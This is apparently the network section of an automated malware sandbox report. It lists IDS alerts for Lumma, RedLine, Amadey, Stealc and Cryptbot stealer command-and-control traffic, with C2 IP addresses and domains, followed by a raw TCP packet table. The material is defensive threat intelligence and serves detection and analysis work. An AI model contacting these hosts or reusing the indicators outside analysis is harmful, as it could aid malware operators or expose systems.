2024-09-03T17:14:06.674759+0200	TCP	2055489	ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)	1	49801	443	192.168.2.8	188.114.96.3
2024-09-03T17:13:20.678238+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:31.305637+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49745	80	192.168.2.8	185.215.113.16
2024-09-03T17:13:48.819631+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49751	80	192.168.2.8	91.202.233.158
2024-09-03T17:14:02.850813+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49790	80	192.168.2.8	185.215.113.19
2024-09-03T17:14:15.496847+0200	TCP	2055490	ET MALWARE Lumma Stealer Domain in TLS SNI (millyscroqwp .shop)	1	49822	443	192.168.2.8	188.114.97.3
2024-09-03T17:14:23.226498+0200	TCP	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	49841	443	192.168.2.8	188.114.96.3
2024-09-03T17:14:23.226498+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49841	443	192.168.2.8	188.114.96.3
2024-09-03T17:14:03.631383+0200	UDP	2055479	ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)	1	63692	53	192.168.2.8	1.1.1.1
2024-09-03T17:14:06.031862+0200	TCP	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	49764	80	192.168.2.8	195.133.48.136
2024-09-03T17:13:25.855534+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49739	80	192.168.2.8	185.215.113.16
2024-09-03T17:14:20.756352+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49816	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:18.083792+0200	TCP	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	49726	80	192.168.2.8	185.215.113.17
2024-09-03T17:13:13.643431+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:14:16.600141+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49822	443	192.168.2.8	188.114.97.3
2024-09-03T17:14:16.600141+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49822	443	192.168.2.8	188.114.97.3
2024-09-03T17:13:32.005801+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49746	80	192.168.2.8	52.212.52.84
2024-09-03T17:13:41.065171+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49754	80	192.168.2.8	185.215.113.16
2024-09-03T17:13:24.847143+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:46.361477+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49751	80	192.168.2.8	91.202.233.158
2024-09-03T17:14:18.638414+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49830	443	192.168.2.8	188.114.96.3
2024-09-03T17:14:18.638414+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49830	443	192.168.2.8	188.114.96.3
2024-09-03T17:13:46.945155+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49751	80	192.168.2.8	91.202.233.158
2024-09-03T17:13:15.957021+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:12.932757+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:12.932757+0200	TCP	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:14:21.830251+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49839	80	192.168.2.8	185.215.113.19
2024-09-03T17:14:07.157467+0200	TCP	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	49801	443	192.168.2.8	188.114.96.3
2024-09-03T17:14:07.157467+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49801	443	192.168.2.8	188.114.96.3
2024-09-03T17:14:05.191700+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49793	80	192.168.2.8	185.215.113.19
2024-09-03T17:13:40.273848+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49751	80	192.168.2.8	91.202.233.158
2024-09-03T17:13:40.810187+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49754	80	192.168.2.8	185.215.113.16
2024-09-03T17:14:24.070396+0200	TCP	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	49825	80	192.168.2.8	195.133.13.230
2024-09-03T17:13:10.974130+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49716	80	192.168.2.8	185.215.113.16
2024-09-03T17:13:30.485032+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49726	80	192.168.2.8	185.215.113.17
2024-09-03T17:13:37.900967+0200	TCP	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	49751	80	192.168.2.8	91.202.233.158
2024-09-03T17:14:20.761258+0200	TCP	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	45580	49816	65.21.18.51	192.168.2.8
2024-09-03T17:14:37.105307+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49852	443	192.168.2.8	188.114.96.3
2024-09-03T17:14:37.105307+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49852	443	192.168.2.8	188.114.96.3
2024-09-03T17:13:49.351159+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49751	80	192.168.2.8	91.202.233.158
2024-09-03T17:13:19.746971+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:18.682070+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:17.976312+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:18.461081+0200	TCP	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	45580	49722	65.21.18.51	192.168.2.8
2024-09-03T17:13:07.196167+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49713	80	192.168.2.8	185.215.113.16
2024-09-03T17:13:18.227640+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	80	49726	185.215.113.17	192.168.2.8
2024-09-03T17:13:49.849507+0200	TCP	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	49764	80	192.168.2.8	195.133.48.136
2024-09-03T17:14:24.140143+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49816	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:27.054219+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49726	80	192.168.2.8	185.215.113.17
2024-09-03T17:13:17.819174+0200	TCP	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	49726	80	192.168.2.8	185.215.113.17
2024-09-03T17:14:43.510485+0200	TCP	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	49854	443	192.168.2.8	188.114.96.3
2024-09-03T17:14:43.510485+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49854	443	192.168.2.8	188.114.96.3
2024-09-03T17:13:44.498009+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49751	80	192.168.2.8	91.202.233.158
2024-09-03T17:13:07.835580+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49713	80	192.168.2.8	185.215.113.16
2024-09-03T17:13:51.866231+0200	TCP	2044249	ET MALWARE Win32/Stealc Submitting Screenshot to C2	1	49751	80	192.168.2.8	91.202.233.158
2024-09-03T17:14:00.124906+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49784	80	192.168.2.8	185.215.113.19
2024-09-03T17:14:10.338401+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49809	80	192.168.2.8	185.215.113.19
2024-09-03T17:14:19.964197+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49834	80	192.168.2.8	185.215.113.19
2024-09-03T17:14:23.608845+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49816	45580	192.168.2.8	65.21.18.51
2024-09-03T17:14:08.741901+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49805	80	192.168.2.8	185.215.113.19
2024-09-03T17:13:17.757166+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49730	80	192.168.2.8	52.212.52.84
2024-09-03T17:13:03.889350+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	49711	80	192.168.2.8	185.215.113.16
2024-09-03T17:13:18.900848+0200	TCP	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	49726	80	192.168.2.8	185.215.113.17
2024-09-03T17:13:37.621860+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49751	80	192.168.2.8	91.202.233.158
2024-09-03T17:14:18.092838+0200	TCP	2055489	ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)	1	49830	443	192.168.2.8	188.114.96.3
2024-09-03T17:13:23.316775+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:45.654603+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49751	80	192.168.2.8	91.202.233.158
2024-09-03T17:13:18.798510+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:14:23.181535+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49816	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:23.809313+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:14:01.488768+0200	TCP	2055490	ET MALWARE Lumma Stealer Domain in TLS SNI (millyscroqwp .shop)	1	49788	443	192.168.2.8	188.114.97.3
2024-09-03T17:13:28.555786+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	49726	80	192.168.2.8	185.215.113.17
2024-09-03T17:13:19.514753+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:54.708553+0200	TCP	2044597	ET MALWARE Amadey Bot Activity (POST) M1	1	49775	80	192.168.2.8	185.215.113.19
2024-09-03T17:14:22.153084+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49816	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:22.226994+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:14:16.981849+0200	TCP	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	49825	80	192.168.2.8	195.133.13.230
2024-09-03T17:13:21.551182+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49722	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:39.040064+0200	TCP	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	49751	80	192.168.2.8	91.202.233.158
2024-09-03T17:14:42.957980+0200	TCP	2055489	ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)	1	49854	443	192.168.2.8	188.114.96.3
2024-09-03T17:13:19.555556+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:11.902992+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	49719	80	192.168.2.8	185.215.113.26
2024-09-03T17:13:15.376718+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:18.505662+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:13:08.594358+0200	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	26212	49714	95.179.250.45	192.168.2.8
2024-09-03T17:13:56.603377+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	1	80	49774	185.215.113.19	192.168.2.8
2024-09-03T17:14:23.890881+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49816	45580	192.168.2.8	65.21.18.51
2024-09-03T17:13:13.411386+0200	TCP	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	45580	49722	65.21.18.51	192.168.2.8
2024-09-03T17:13:15.763012+0200	TCP	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	49714	26212	192.168.2.8	95.179.250.45
2024-09-03T17:14:36.198012+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49851	443	192.168.2.8	188.114.97.3
2024-09-03T17:14:36.198012+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49851	443	192.168.2.8	188.114.97.3
2024-09-03T17:14:04.407913+0200	TCP	2055489	ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)	1	49794	443	192.168.2.8	188.114.96.3
2024-09-03T17:13:14.463443+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	49723	80	192.168.2.8	185.215.113.16

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 3, 2024 17:13:03.044867039 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:03.061904907 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:03.062045097 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:03.062192917 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:03.067075014 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:03.889269114 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:03.889349937 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:03.890990973 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:03.895972967 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:04.390229940 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:04.390326023 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:04.391757965 CEST	80	49711	185.215.113.16	192.168.2.8
Sep 3, 2024 17:13:04.391817093 CEST	49711	80	192.168.2.8	185.215.113.16
Sep 3, 2024 17:13:04.426625013 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:04.431427002 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:04.431519985 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:04.431611061 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:04.436460972 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.130538940 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.130605936 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.274153948 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.274235010 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.274247885 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.274261951 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.274266005 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.274311066 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.274311066 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.280402899 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.280416012 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.280426979 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.280436039 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.280459881 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.280472040 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.280476093 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.280487061 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.280488014 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.280504942 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.280575037 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.280733109 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.280785084 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.374686956 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.374788046 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.374818087 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.374841928 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.374854088 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.374864101 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.374870062 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.374891043 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.374917984 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.374969006 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.375010014 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.375092030 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.375109911 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.375129938 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.375143051 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.375164032 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.375174046 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.375201941 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.375216961 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.375840902 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.375852108 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.375869989 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.375875950 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.375885963 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.375886917 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.375910044 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.376077890 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.376668930 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.376722097 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.376723051 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.376734018 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.376765966 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.376811981 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.376823902 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.376864910 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.377453089 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.377509117 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.377512932 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.377526045 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.377554893 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.377568960 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.379673958 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.379692078 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.379725933 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.379736900 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.475047112 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475060940 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475070953 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475136995 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475150108 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475147009 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.475183964 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.475188971 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475199938 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475209951 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.475212097 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475224018 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475231886 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.475245953 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.475271940 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.475337982 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475351095 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475362062 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475390911 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.475409985 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.475656033 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475667000 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475677967 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475707054 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.475728989 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.475801945 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475812912 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.475852013 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.475996017 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476038933 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.476044893 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476056099 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476085901 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.476105928 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.476126909 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476138115 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476149082 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476161003 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476176023 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.476191998 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.476283073 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476336956 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.476499081 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476551056 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.476629972 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476641893 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476653099 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476680994 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.476715088 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.476749897 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476762056 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476804018 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.476875067 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476922989 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.476933002 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476946115 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476955891 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.476984978 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.477009058 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.477092028 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477102995 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477113962 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477149963 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.477173090 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.477612019 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477622032 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477633953 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477662086 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.477668047 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477679968 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477685928 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.477720976 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.477793932 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477840900 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.477859974 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477871895 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477883101 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477897882 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.477914095 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.477930069 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.477955103 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.480204105 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.480262041 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.521418095 CEST	80	49712	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:05.521517038 CEST	49712	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:05.575067043 CEST	80	49712	52.212.52.84	192.168.2.8
